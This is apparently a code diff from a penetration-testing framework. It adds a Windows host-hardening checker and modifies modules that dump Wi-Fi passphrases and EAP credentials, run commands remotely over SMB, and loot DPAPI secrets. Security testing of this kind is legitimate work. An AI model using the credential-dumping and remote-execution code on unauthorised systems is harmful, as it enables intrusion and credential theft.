reasons.append(f'{value_name}: Value not found')
|
||||||
|
else:
|
||||||
|
ok = False
|
||||||
|
reasons.append(f'Error while retrieving value of {key}\\{value_name}: {value}')
|
||||||
|
continue
|
||||||
|
|
||||||
|
if op(value, expected_value):
|
||||||
|
if options['lastWins']:
|
||||||
|
ok = True
|
||||||
|
reasons.append(opstring.format(left=f'{key}\\{value_name} ({value})', right=expected_value))
|
||||||
|
else:
|
||||||
|
reasons.append(nopstring.format(left=f'{key}\\{value_name} ({value})', right=expected_value))
|
||||||
|
ok = False
|
||||||
|
if ok and options['stopOnOK']:
|
||||||
|
break
|
||||||
|
if not ok and options['stopOnKO']:
|
||||||
|
break
|
||||||
|
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
def check_laps(self):
|
||||||
|
reasons = []
|
||||||
|
success = False
|
||||||
|
lapsv2_ad_key_name = 'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\LAPS'
|
||||||
|
lapsv2_aad_key_name = 'Software\\Microsoft\\Policies\\LAPS'
|
||||||
|
|
||||||
|
# Checking LAPSv2
|
||||||
|
ans = self._open_root_key(self.dce, self.connection, 'HKLM')
|
||||||
|
|
||||||
|
if ans is None:
|
||||||
|
return False, ['Could not query remote registry']
|
||||||
|
|
||||||
|
root_key_handle = ans['phKey']
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegOpenKey(self.dce, root_key_handle, lapsv2_ad_key_name)
|
||||||
|
reasons.append(f"HKLM\\{lapsv2_ad_key_name} found, LAPSv2 AD installed")
|
||||||
|
success = True
|
||||||
|
return success, reasons
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code != ERROR_FILE_NOT_FOUND:
|
||||||
|
reasons.append(f"HKLM\\{lapsv2_ad_key_name} not found")
|
||||||
|
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegOpenKey(self.dce, root_key_handle, lapsv2_aad_key_name)
|
||||||
|
reasons.append(f"HKLM\\{lapsv2_aad_key_name} found, LAPSv2 AAD installed")
|
||||||
|
success = True
|
||||||
|
return success, reasons
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code != ERROR_FILE_NOT_FOUND:
|
||||||
|
reasons.append(f"HKLM\\{lapsv2_aad_key_name} not found")
|
||||||
|
|
||||||
|
# LAPSv2 does not seems to be installed, checking LAPSv1
|
||||||
|
lapsv1_key_name = 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\GPextensions'
|
||||||
|
subkeys = self.reg_get_subkeys(self.dce, self.connection, lapsv1_key_name)
|
||||||
|
laps_path = '\\Program Files\\LAPS\\CSE'
|
||||||
|
|
||||||
|
for subkey in subkeys:
|
||||||
|
value = self.reg_query_value(self.dce, self.connection, lapsv1_key_name + '\\' + subkey, 'DllName')
|
||||||
|
if type(value) == str and 'laps\\cse\\admpwd.dll' in value.lower():
|
||||||
|
reasons.append(f'{lapsv1_key_name}\\...\\DllName matches AdmPwd.dll')
|
||||||
|
success = True
|
||||||
|
laps_path = '\\'.join(value.split('\\')[1:-1])
|
||||||
|
break
|
||||||
|
if not success:
|
||||||
|
reasons.append(f'No match found in {lapsv1_key_name}\\...\\DllName')
|
||||||
|
|
||||||
|
l = self.ls(self.connection, laps_path)
|
||||||
|
if l:
|
||||||
|
reasons.append('Found LAPS folder at ' + laps_path)
|
||||||
|
else:
|
||||||
|
success = False
|
||||||
|
reasons.append('LAPS folder does not exist')
|
||||||
|
return success, reasons
|
||||||
|
|
||||||
|
|
||||||
|
l = self.ls(self.connection, laps_path + '\\AdmPwd.dll')
|
||||||
|
if l:
|
||||||
|
reasons.append(f'Found {laps_path}\\AdmPwd.dll')
|
||||||
|
else:
|
||||||
|
success = False
|
||||||
|
reasons.append(f'{laps_path}\\AdmPwd.dll not found')
|
||||||
|
|
||||||
|
return success, reasons
|
||||||
|
|
||||||
|
def check_last_successful_update(self):
|
||||||
|
records = self.connection.wmi(wmi_query='Select TimeGenerated FROM Win32_ReliabilityRecords Where EventIdentifier=19', namespace='root\\cimv2')
|
||||||
|
if len(records) == 0:
|
||||||
|
return False, ['No update found']
|
||||||
|
most_recent_update_date = records[0]['TimeGenerated']['value']
|
||||||
|
most_recent_update_date = most_recent_update_date.split('.')[0]
|
||||||
|
most_recent_update_date = time.strptime(most_recent_update_date, '%Y%m%d%H%M%S')
|
||||||
|
most_recent_update_date = time.mktime(most_recent_update_date)
|
||||||
|
now = time.time()
|
||||||
|
days_since_last_update = (now - most_recent_update_date)//86400
|
||||||
|
if days_since_last_update <= OUTDATED_THRESHOLD:
|
||||||
|
return True, [f'Last update was {days_since_last_update} <= {OUTDATED_THRESHOLD} days ago']
|
||||||
|
else:
|
||||||
|
return False, [f'Last update was {days_since_last_update} > {OUTDATED_THRESHOLD} days ago']
|
||||||
|
|
||||||
|
def check_administrator_name(self):
|
||||||
|
user_info = self.get_user_info(self.connection, rid=500)
|
||||||
|
name = user_info['UserName']
|
||||||
|
ok = name not in ('Administrator', 'Administrateur')
|
||||||
|
reasons = [f'Administrator name changed to {name}' if ok else 'Administrator name unchanged']
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
def check_guest_account_disabled(self):
|
||||||
|
user_info = self.get_user_info(self.connection, rid=501)
|
||||||
|
uac = user_info['UserAccountControl']
|
||||||
|
disabled = bool(uac & samr.USER_ACCOUNT_DISABLED)
|
||||||
|
reasons = ['Guest account disabled' if disabled else 'Guest account enabled']
|
||||||
|
return disabled, reasons
|
||||||
|
|
||||||
|
def check_spooler_service(self):
|
||||||
|
ok = False
|
||||||
|
service_config, service_status = self.get_service('Spooler', self.connection)
|
||||||
|
if service_config['dwStartType'] == scmr.SERVICE_DISABLED:
|
||||||
|
ok = True
|
||||||
|
reasons = ['Spooler service disabled']
|
||||||
|
else:
|
||||||
|
reasons = ['Spooler service enabled']
|
||||||
|
if service_status == scmr.SERVICE_RUNNING:
|
||||||
|
reasons.append('Spooler service running')
|
||||||
|
elif service_status == scmr.SERVICE_STOPPED:
|
||||||
|
ok = True
|
||||||
|
reasons.append('Spooler service not running')
|
||||||
|
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
def check_wsus_running(self):
|
||||||
|
ok = True
|
||||||
|
reasons = []
|
||||||
|
service_config, service_status = self.get_service('wuauserv', self.connection)
|
||||||
|
if service_config['dwStartType'] == scmr.SERVICE_DISABLED:
|
||||||
|
reasons = ['WSUS service disabled']
|
||||||
|
elif service_status != scmr.SERVICE_RUNNING:
|
||||||
|
reasons = ['WSUS service not running']
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
def check_nbtns(self):
|
||||||
|
key_name = 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NetBT\\Parameters\\Interfaces'
|
||||||
|
subkeys = self.reg_get_subkeys(self.dce, self.connection, key_name)
|
||||||
|
success = False
|
||||||
|
reasons = []
|
||||||
|
missing = 0
|
||||||
|
nbtns_enabled = 0
|
||||||
|
for subkey in subkeys:
|
||||||
|
value = self.reg_query_value(self.dce, self.connection, key_name + '\\' + subkey, 'NetbiosOptions')
|
||||||
|
if type(value) == DCERPCSessionError:
|
||||||
|
if value.error_code == ERROR_OBJECT_NOT_FOUND:
|
||||||
|
missing += 1
|
||||||
|
continue
|
||||||
|
if value != 2:
|
||||||
|
nbtns_enabled += 1
|
||||||
|
if missing > 0:
|
||||||
|
reasons.append(f'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NetBT\\Parameters\\Interfaces\\<interface>\\NetbiosOption: value not found on {missing} interfaces')
|
||||||
|
if nbtns_enabled > 0:
|
||||||
|
reasons.append(f'NBTNS enabled on {nbtns_enabled} interfaces out of {len(subkeys)}')
|
||||||
|
if missing == 0 and nbtns_enabled == 0:
|
||||||
|
success = True
|
||||||
|
reasons.append('NBTNS disabled on all interfaces')
|
||||||
|
return success, reasons
|
||||||
|
|
||||||
|
def check_applocker(self):
|
||||||
|
key_name = 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\SrpV2'
|
||||||
|
subkeys = self.reg_get_subkeys(self.dce, self.connection, key_name)
|
||||||
|
rule_count = 0
|
||||||
|
for collection in subkeys:
|
||||||
|
collection_key_name = key_name + '\\' + collection
|
||||||
|
rules = self.reg_get_subkeys(self.dce, self.connection, collection_key_name)
|
||||||
|
rule_count += len(rules)
|
||||||
|
success = rule_count > 0
|
||||||
|
reasons = [f'Found {rule_count} AppLocker rules defined']
|
||||||
|
|
||||||
|
return success, reasons
|
||||||
|
|
||||||
|
# Methods for getting values from the remote registry #
|
||||||
|
#######################################################
|
||||||
|
|
||||||
|
def _open_root_key(self, dce, connection, root_key):
|
||||||
|
ans = None
|
||||||
|
retries = 1
|
||||||
|
opener = {
|
||||||
|
'HKLM':rrp.hOpenLocalMachine,
|
||||||
|
'HKCR':rrp.hOpenClassesRoot,
|
||||||
|
'HKU':rrp.hOpenUsers,
|
||||||
|
'HKCU':rrp.hOpenCurrentUser,
|
||||||
|
'HKCC':rrp.hOpenCurrentConfig
|
||||||
|
}
|
||||||
|
|
||||||
|
while retries > 0:
|
||||||
|
try:
|
||||||
|
ans = opener[root_key.upper()](dce)
|
||||||
|
break
|
||||||
|
except KeyError:
|
||||||
|
self.context.log.error(f'HostChecker._open_root_key():{connection.host}: Invalid root key. Must be one of HKCR, HKCC, HKCU, HKLM or HKU')
|
||||||
|
break
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'HostChecker._open_root_key():{connection.host}: Error while trying to open {root_key.upper()}: {e}')
|
||||||
|
if 'Broken pipe' in e.args:
|
||||||
|
self.context.log.error('Retrying')
|
||||||
|
retries -= 1
|
||||||
|
return ans
|
||||||
|
|
||||||
|
def reg_get_subkeys(self, dce, connection, key_name):
|
||||||
|
root_key, subkey = key_name.split('\\', 1)
|
||||||
|
ans = self._open_root_key(dce, connection, root_key)
|
||||||
|
subkeys = []
|
||||||
|
if ans is None:
|
||||||
|
return subkeys
|
||||||
|
|
||||||
|
root_key_handle = ans['phKey']
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegOpenKey(dce, root_key_handle, subkey)
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code != ERROR_FILE_NOT_FOUND:
|
||||||
|
self.context.log.error(f'HostChecker.reg_get_subkeys(): Could not retrieve subkey {subkey}: {e}\n')
|
||||||
|
return subkeys
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'HostChecker.reg_get_subkeys(): Error while trying to retrieve subkey {subkey}: {e}\n')
|
||||||
|
return subkeys
|
||||||
|
|
||||||
|
subkey_handle = ans['phkResult']
|
||||||
|
i = 0
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegEnumKey(dce=dce, hKey=subkey_handle, dwIndex=i)
|
||||||
|
subkeys.append(ans['lpNameOut'][:-1])
|
||||||
|
i += 1
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
break
|
||||||
|
return subkeys
|
||||||
|
|
||||||
|
def reg_query_value(self, dce, connection, keyName, valueName=None):
|
||||||
|
"""
|
||||||
|
Query remote registry data for a given registry value
|
||||||
|
"""
|
||||||
|
def subkey_values(subkey_handle):
|
||||||
|
dwIndex = 0
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
value_type, value_name, value_data = get_value(subkey_handle, dwIndex)
|
||||||
|
yield (value_type, value_name, value_data)
|
||||||
|
dwIndex += 1
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code == ERROR_NO_MORE_ITEMS:
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
self.context.log.error(f'HostChecker.reg_query_value()->sub_key_values(): Received error code {e.error_code}')
|
||||||
|
return
|
||||||
|
|
||||||
|
def get_value(subkey_handle, dwIndex=0):
|
||||||
|
ans = rrp.hBaseRegEnumValue(dce=dce, hKey=subkey_handle, dwIndex=dwIndex)
|
||||||
|
value_type = ans['lpType']
|
||||||
|
value_name = ans['lpValueNameOut']
|
||||||
|
value_data = ans['lpData']
|
||||||
|
|
||||||
|
# Do any conversion necessary depending on the registry value type
|
||||||
|
if value_type in (
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING,
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING_WITH_ENV,
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING_SEQUENCE):
|
||||||
|
value_data = b''.join(value_data).decode('utf-16')
|
||||||
|
else:
|
||||||
|
value_data = b''.join(value_data)
|
||||||
|
if value_type in (
|
||||||
|
REG_VALUE_TYPE_32BIT_LE,
|
||||||
|
REG_VALUE_TYPE_64BIT_LE):
|
||||||
|
value_data = int.from_bytes(value_data, 'little')
|
||||||
|
elif value_type == REG_VALUE_TYPE_32BIT_BE:
|
||||||
|
value_data = int.from_bytes(value_data, 'big')
|
||||||
|
|
||||||
|
return value_type, value_name[:-1], value_data
|
||||||
|
|
||||||
|
try:
|
||||||
|
root_key, subkey = keyName.split('\\', 1)
|
||||||
|
except ValueError:
|
||||||
|
self.context.log.error(f'HostChecker.reg_query_value(): Could not split keyname {keyName}')
|
||||||
|
return
|
||||||
|
|
||||||
|
ans = self._open_root_key(dce, connection, root_key)
|
||||||
|
if ans is None:
|
||||||
|
return ans
|
||||||
|
|
||||||
|
root_key_handle = ans['phKey']
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegOpenKey(dce, root_key_handle, subkey)
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code == ERROR_FILE_NOT_FOUND:
|
||||||
|
return e
|
||||||
|
|
||||||
|
subkey_handle = ans['phkResult']
|
||||||
|
|
||||||
|
if valueName is None:
|
||||||
|
_,_, data = get_value(subkey_handle)
|
||||||
|
else:
|
||||||
|
found = False
|
||||||
|
for _,name,data in subkey_values(subkey_handle):
|
||||||
|
if name.upper() == valueName.upper():
|
||||||
|
found = True
|
||||||
|
break
|
||||||
|
if not found:
|
||||||
|
return DCERPCSessionError(error_code=ERROR_OBJECT_NOT_FOUND)
|
||||||
|
return data
|
||||||
|
|
||||||
|
# Methods for getting values from SAMR and SCM #
|
||||||
|
################################################
|
||||||
|
|
||||||
|
def get_service(self, service_name, connection):
|
||||||
|
"""
|
||||||
|
Get the service status and configuration for specified service
|
||||||
|
"""
|
||||||
|
remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)
|
||||||
|
machine_name,_ = remoteOps.getMachineNameAndDomain()
|
||||||
|
remoteOps._RemoteOperations__connectSvcCtl()
|
||||||
|
dce = remoteOps._RemoteOperations__scmr
|
||||||
|
scm_handle = scmr.hROpenSCManagerW(dce, machine_name)['lpScHandle']
|
||||||
|
service_handle = scmr.hROpenServiceW(dce, scm_handle, service_name)['lpServiceHandle']
|
||||||
|
service_config = scmr.hRQueryServiceConfigW(dce, service_handle)['lpServiceConfig']
|
||||||
|
service_status = scmr.hRQueryServiceStatus(dce, service_handle)['lpServiceStatus']['dwCurrentState']
|
||||||
|
remoteOps.finish()
|
||||||
|
|
||||||
|
return service_config, service_status
|
||||||
|
|
||||||
|
def get_user_info(self, connection, rid=501):
|
||||||
|
"""
|
||||||
|
Get user information for the user with the specified RID
|
||||||
|
"""
|
||||||
|
remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)
|
||||||
|
machine_name, domain_name = remoteOps.getMachineNameAndDomain()
|
||||||
|
|
||||||
|
try:
|
||||||
|
remoteOps.connectSamr(machine_name)
|
||||||
|
except samr.DCERPCSessionError:
|
||||||
|
# If connecting to machine_name didn't work, it's probably because
|
||||||
|
# we're dealing with a domain controller, so we need to use the
|
||||||
|
# actual domain name instead of the machine name, because DCs don't
|
||||||
|
# use the SAM
|
||||||
|
remoteOps.connectSamr(domain_name)
|
||||||
|
|
||||||
|
dce = remoteOps._RemoteOperations__samr
|
||||||
|
domain_handle = remoteOps._RemoteOperations__domainHandle
|
||||||
|
user_handle = samr.hSamrOpenUser(dce, domain_handle, userId=rid)['UserHandle']
|
||||||
|
user_info = samr.hSamrQueryInformationUser2(dce, user_handle, samr.USER_INFORMATION_CLASS.UserAllInformation)
|
||||||
|
user_info = user_info['Buffer']['All']
|
||||||
|
remoteOps.finish()
|
||||||
|
return user_info
|
||||||
|
|
||||||
|
def ls(self, smb, path='\\', share='C$'):
|
||||||
|
l = []
|
||||||
|
try:
|
||||||
|
l = smb.conn.listPath(share, path)
|
||||||
|
except SMBSessionError as e:
|
||||||
|
if e.getErrorString()[0] not in ('STATUS_NO_SUCH_FILE', 'STATUS_OBJECT_NAME_NOT_FOUND'):
|
||||||
|
self.context.log.error(f'ls(): C:\\{path} {e.getErrorString()}')
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'ls(): C:\\{path} {e}\n')
|
||||||
|
return l
|
||||||
|
|
||||||
|
# Comparison operators #
|
||||||
|
########################
|
||||||
|
|
||||||
|
def le(reg_sz_string, number):
|
||||||
|
return int(reg_sz_string[:-1]) <= number
|
||||||
|
|
||||||
|
def in_(obj, seq):
|
||||||
|
return obj in seq
|
||||||
|
|
||||||
|
def startswith(string, start):
|
||||||
|
return string.startswith(start)
|
||||||
|
|
||||||
|
def not_(boolean_operator):
|
||||||
|
def wrapper(*args, **kwargs):
|
||||||
|
return not boolean_operator(*args, **kwargs)
|
||||||
|
wrapper.__name__ = f'not_{boolean_operator.__name__}'
|
||||||
|
return wrapper
|
|
@ -74,7 +74,7 @@ class CMEModule:
|
||||||
for wifi_cred in wifi_creds:
|
for wifi_cred in wifi_creds:
|
||||||
if wifi_cred.auth.upper() == "OPEN":
|
if wifi_cred.auth.upper() == "OPEN":
|
||||||
context.log.highlight("[OPEN] %s" % (wifi_cred.ssid))
|
context.log.highlight("[OPEN] %s" % (wifi_cred.ssid))
|
||||||
if wifi_cred.auth.upper() in ["WPAPSK", "WPA2PSK"]:
|
elif wifi_cred.auth.upper() in ["WPAPSK", "WPA2PSK", "WPA3SAE"]:
|
||||||
try:
|
try:
|
||||||
context.log.highlight(
|
context.log.highlight(
|
||||||
"[%s] %s - Passphrase: %s"
|
"[%s] %s - Passphrase: %s"
|
||||||
|
@ -86,5 +86,29 @@ class CMEModule:
|
||||||
)
|
)
|
||||||
except:
|
except:
|
||||||
context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))
|
context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))
|
||||||
|
elif wifi_cred.auth.upper() in ['WPA', 'WPA2']:
|
||||||
|
try:
|
||||||
|
if self.eap_username is not None and self.eap_password is not None:
|
||||||
|
context.log.highlight(
|
||||||
|
"[%s] %s - %s - Identifier: %s:%s"
|
||||||
|
% (
|
||||||
|
wifi_cred.auth.upper(),
|
||||||
|
wifi_cred.ssid,
|
||||||
|
wifi_cred.eap_type,
|
||||||
|
wifi_cred.eap_username,
|
||||||
|
wifi_cred.eap_password,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
context.log.highlight(
|
||||||
|
"[%s] %s - %s "
|
||||||
|
% (
|
||||||
|
wifi_cred.auth.upper(),
|
||||||
|
wifi_cred.ssid,
|
||||||
|
wifi_cred.eap_type,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
except:
|
||||||
|
context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))
|
||||||
else:
|
else:
|
||||||
context.log.highlight("[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type))
|
context.log.highlight("[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type))
|
||||||
|
|
|
@ -179,7 +179,7 @@ class rdp(connection):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
async def connect_rdp(self):
|
async def connect_rdp(self):
|
||||||
_, err = await self.conn.connect()
|
_, err = await asyncio.wait_for(self.conn.connect(), timeout=self.args.rdp_timeout)
|
||||||
if err is not None:
|
if err is not None:
|
||||||
raise err
|
raise err
|
||||||
|
|
||||||
|
@ -371,7 +371,7 @@ class rdp(connection):
|
||||||
self.iosettings.supported_protocols = None
|
self.iosettings.supported_protocols = None
|
||||||
self.auth = NTLMCredential(secret="", username="", domain="", stype=asyauthSecret.PASS)
|
self.auth = NTLMCredential(secret="", username="", domain="", stype=asyauthSecret.PASS)
|
||||||
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
|
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
|
||||||
await self.connect_rdp_old(self.url)
|
await self.connect_rdp()
|
||||||
await asyncio.sleep(int(self.args.screentime))
|
await asyncio.sleep(int(self.args.screentime))
|
||||||
|
|
||||||
if self.conn is not None and self.conn.desktop_buffer_has_data is True:
|
if self.conn is not None and self.conn.desktop_buffer_has_data is True:
|
||||||
|
|
|
@ -2,7 +2,7 @@ def proto_args(parser, std_parser, module_parser):
|
||||||
rdp_parser = parser.add_parser('rdp', help="own stuff using RDP", parents=[std_parser, module_parser])
|
rdp_parser = parser.add_parser('rdp', help="own stuff using RDP", parents=[std_parser, module_parser])
|
||||||
rdp_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
|
rdp_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
|
||||||
rdp_parser.add_argument("--port", type=int, default=3389, help="Custom RDP port")
|
rdp_parser.add_argument("--port", type=int, default=3389, help="Custom RDP port")
|
||||||
rdp_parser.add_argument("--rdp-timeout", type=int, default=1, help="RDP timeout on socket connection")
|
rdp_parser.add_argument("--rdp-timeout", type=int, default=5, help="RDP timeout on socket connection, defalut is %(default)ss")
|
||||||
rdp_parser.add_argument("--nla-screenshot", action="store_true", help="Screenshot RDP login prompt if NLA is disabled")
|
rdp_parser.add_argument("--nla-screenshot", action="store_true", help="Screenshot RDP login prompt if NLA is disabled")
|
||||||
|
|
||||||
dgroup = rdp_parser.add_mutually_exclusive_group()
|
dgroup = rdp_parser.add_mutually_exclusive_group()
|
||||||
|
@ -11,7 +11,7 @@ def proto_args(parser, std_parser, module_parser):
|
||||||
|
|
||||||
egroup = rdp_parser.add_argument_group("Screenshot", "Remote Desktop Screenshot")
|
egroup = rdp_parser.add_argument_group("Screenshot", "Remote Desktop Screenshot")
|
||||||
egroup.add_argument("--screenshot", action="store_true", help="Screenshot RDP if connection success")
|
egroup.add_argument("--screenshot", action="store_true", help="Screenshot RDP if connection success")
|
||||||
egroup.add_argument('--screentime', type=int, default=10, help='Time to wait for desktop image')
|
egroup.add_argument('--screentime', type=int, default=10, help='Time to wait for desktop image, default is %(default)ss')
|
||||||
egroup.add_argument('--res', default='1024x768', help='Resolution in "WIDTHxHEIGHT" format. Default: "1024x768"')
|
egroup.add_argument('--res', default='1024x768', help='Resolution in "WIDTHxHEIGHT" format. Default: "1024x768"')
|
||||||
|
|
||||||
return parser
|
return parser
|
|
@ -665,14 +665,16 @@ class smb(connection):
|
||||||
if self.args.exec_method:
|
if self.args.exec_method:
|
||||||
methods = [self.args.exec_method]
|
methods = [self.args.exec_method]
|
||||||
if not methods:
|
if not methods:
|
||||||
methods = ["wmiexec", "smbexec", "mmcexec", "atexec"]
|
methods = ["wmiexec", "atexec", "smbexec", "mmcexec"]
|
||||||
|
|
||||||
if not payload and self.args.execute:
|
if not payload and self.args.execute:
|
||||||
payload = self.args.execute
|
payload = self.args.execute
|
||||||
if not self.args.no_output:
|
if not self.args.no_output:
|
||||||
get_output = True
|
get_output = True
|
||||||
|
|
||||||
|
current_method = ""
|
||||||
for method in methods:
|
for method in methods:
|
||||||
|
current_method = method
|
||||||
if method == "wmiexec":
|
if method == "wmiexec":
|
||||||
try:
|
try:
|
||||||
exec_method = WMIEXEC(
|
exec_method = WMIEXEC(
|
||||||
|
@ -687,7 +689,9 @@ class smb(connection):
|
||||||
self.kdcHost,
|
self.kdcHost,
|
||||||
self.hash,
|
self.hash,
|
||||||
self.args.share,
|
self.args.share,
|
||||||
logger=self.logger
|
logger=self.logger,
|
||||||
|
timeout=self.args.wmiexec_timeout,
|
||||||
|
tries=self.args.get_output_tries
|
||||||
)
|
)
|
||||||
self.logger.info("Executed command via wmiexec")
|
self.logger.info("Executed command via wmiexec")
|
||||||
break
|
break
|
||||||
|
@ -705,7 +709,9 @@ class smb(connection):
|
||||||
self.domain,
|
self.domain,
|
||||||
self.conn,
|
self.conn,
|
||||||
self.args.share,
|
self.args.share,
|
||||||
self.hash
|
self.hash,
|
||||||
|
self.logger,
|
||||||
|
self.args.get_output_tries
|
||||||
)
|
)
|
||||||
self.logger.info("Executed command via mmcexec")
|
self.logger.info("Executed command via mmcexec")
|
||||||
break
|
break
|
||||||
|
@ -725,7 +731,8 @@ class smb(connection):
|
||||||
self.aesKey,
|
self.aesKey,
|
||||||
self.kdcHost,
|
self.kdcHost,
|
||||||
self.hash,
|
self.hash,
|
||||||
self.logger
|
self.logger,
|
||||||
|
self.args.get_output_tries
|
||||||
) # self.args.share)
|
) # self.args.share)
|
||||||
self.logger.info("Executed command via atexec")
|
self.logger.info("Executed command via atexec")
|
||||||
break
|
break
|
||||||
|
@ -749,7 +756,8 @@ class smb(connection):
|
||||||
self.hash,
|
self.hash,
|
||||||
self.args.share,
|
self.args.share,
|
||||||
self.args.port,
|
self.args.port,
|
||||||
self.logger
|
self.logger,
|
||||||
|
self.args.get_output_tries
|
||||||
)
|
)
|
||||||
self.logger.info("Executed command via smbexec")
|
self.logger.info("Executed command via smbexec")
|
||||||
break
|
break
|
||||||
|
@ -761,8 +769,8 @@ class smb(connection):
|
||||||
if hasattr(self, "server"):
|
if hasattr(self, "server"):
|
||||||
self.server.track_host(self.host)
|
self.server.track_host(self.host)
|
||||||
|
|
||||||
|
if "exec_method" in locals():
|
||||||
output = exec_method.execute(payload, get_output)
|
output = exec_method.execute(payload, get_output)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if not isinstance(output, str):
|
if not isinstance(output, str):
|
||||||
output = output.decode(self.args.codec)
|
output = output.decode(self.args.codec)
|
||||||
|
@ -773,13 +781,15 @@ class smb(connection):
|
||||||
output = output.strip()
|
output = output.strip()
|
||||||
self.logger.debug(f"Output: {output}")
|
self.logger.debug(f"Output: {output}")
|
||||||
|
|
||||||
if self.args.execute or self.args.ps_execute:
|
if (self.args.execute or self.args.ps_execute) and output:
|
||||||
self.logger.success(f"Executed command {self.args.exec_method if self.args.exec_method else ''}")
|
self.logger.success(f"Executed command via {current_method}")
|
||||||
buf = StringIO(output).readlines()
|
buf = StringIO(output).readlines()
|
||||||
for line in buf:
|
for line in buf:
|
||||||
self.logger.highlight(line.strip())
|
self.logger.highlight(line.strip())
|
||||||
|
|
||||||
return output
|
return output
|
||||||
|
else:
|
||||||
|
self.logger.fail(f"Execute command failed with {current_method}")
|
||||||
|
return False
|
||||||
|
|
||||||
@requires_admin
|
@requires_admin
|
||||||
def ps_execute(
|
def ps_execute(
|
||||||
|
@ -1456,6 +1466,7 @@ class smb(connection):
|
||||||
|
|
||||||
@requires_admin
|
@requires_admin
|
||||||
def dpapi(self):
|
def dpapi(self):
|
||||||
|
dump_system = False if "nosystem" in self.args.dpapi else True
|
||||||
logging.getLogger("dploot").disabled = True
|
logging.getLogger("dploot").disabled = True
|
||||||
|
|
||||||
if self.args.pvk is not None:
|
if self.args.pvk is not None:
|
||||||
|
@ -1463,7 +1474,7 @@ class smb(connection):
|
||||||
self.pvkbytes = open(self.args.pvk, "rb").read()
|
self.pvkbytes = open(self.args.pvk, "rb").read()
|
||||||
self.logger.success(f"Loading domain backupkey from {self.args.pvk}")
|
self.logger.success(f"Loading domain backupkey from {self.args.pvk}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
logging.error(str(e))
|
self.logger.fail(str(e))
|
||||||
|
|
||||||
masterkeys = []
|
masterkeys = []
|
||||||
if self.args.mkfile is not None:
|
if self.args.mkfile is not None:
|
||||||
|
@ -1551,6 +1562,7 @@ class smb(connection):
|
||||||
)
|
)
|
||||||
self.logger.debug(f"Masterkeys Triage: {masterkeys_triage}")
|
self.logger.debug(f"Masterkeys Triage: {masterkeys_triage}")
|
||||||
masterkeys += masterkeys_triage.triage_masterkeys()
|
masterkeys += masterkeys_triage.triage_masterkeys()
|
||||||
|
if dump_system:
|
||||||
masterkeys += masterkeys_triage.triage_system_masterkeys()
|
masterkeys += masterkeys_triage.triage_system_masterkeys()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.debug(f"Could not get masterkeys: {e}")
|
self.logger.debug(f"Could not get masterkeys: {e}")
|
||||||
|
@ -1561,12 +1573,15 @@ class smb(connection):
|
||||||
|
|
||||||
self.logger.success(f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets...")
|
self.logger.success(f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets...")
|
||||||
|
|
||||||
|
credentials = []
|
||||||
|
system_credentials = []
|
||||||
try:
|
try:
|
||||||
# Collect User and Machine Credentials Manager secrets
|
# Collect User and Machine Credentials Manager secrets
|
||||||
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=masterkeys)
|
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=masterkeys)
|
||||||
self.logger.debug(f"Credentials Triage Object: {credentials_triage}")
|
self.logger.debug(f"Credentials Triage Object: {credentials_triage}")
|
||||||
credentials = credentials_triage.triage_credentials()
|
credentials = credentials_triage.triage_credentials()
|
||||||
self.logger.debug(f"Triaged Credentials: {credentials}")
|
self.logger.debug(f"Triaged Credentials: {credentials}")
|
||||||
|
if dump_system:
|
